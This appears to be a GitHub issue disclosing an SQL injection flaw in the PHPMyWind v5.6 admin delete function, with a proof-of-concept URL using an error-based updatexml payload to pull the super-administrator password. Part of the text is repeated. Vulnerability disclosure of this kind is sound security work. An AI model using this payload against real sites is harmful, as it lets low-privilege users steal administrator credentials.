You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Product Homepage:http://phpmywind.com/
hello!
I found a serious SQL injection vulnerability in the backend management system(/admin/admin_save.php) of PHPMyWind v5.6
This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords
Vulnerability validation:
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers
Now to the site administrator login background management system, click the administrator management, and then "delete function" is the location of the vulnerability
it's url is http://127.0.0.1/admin/admin_save.php?action=del&id=4 POC
(1) http://127.0.0.1/admin/admin_save.php?action=del&id=4%27
(2)show the current database
http://127.0.0.1/admin/admin_save.php?action=del&id=4 and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))
This vulnerability allows you to query the database for any data you want
The text was updated successfully, but these errors were encountered:
Product Homepage:http://phpmywind.com/
hello!
I found a serious SQL injection vulnerability in the backend management system(
/admin/admin_save.php) of PHPMyWind v5.6This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords
Vulnerability validation:
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers
Now to the site administrator login background management system, click the administrator management, and then "delete function" is the location of the vulnerability
it's url is
http://127.0.0.1/admin/admin_save.php?action=del&id=4POC
(1)
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27(2)show the current database
(3) Query out the super administrator password
This vulnerability allows you to query the database for any data you want
The text was updated successfully, but these errors were encountered: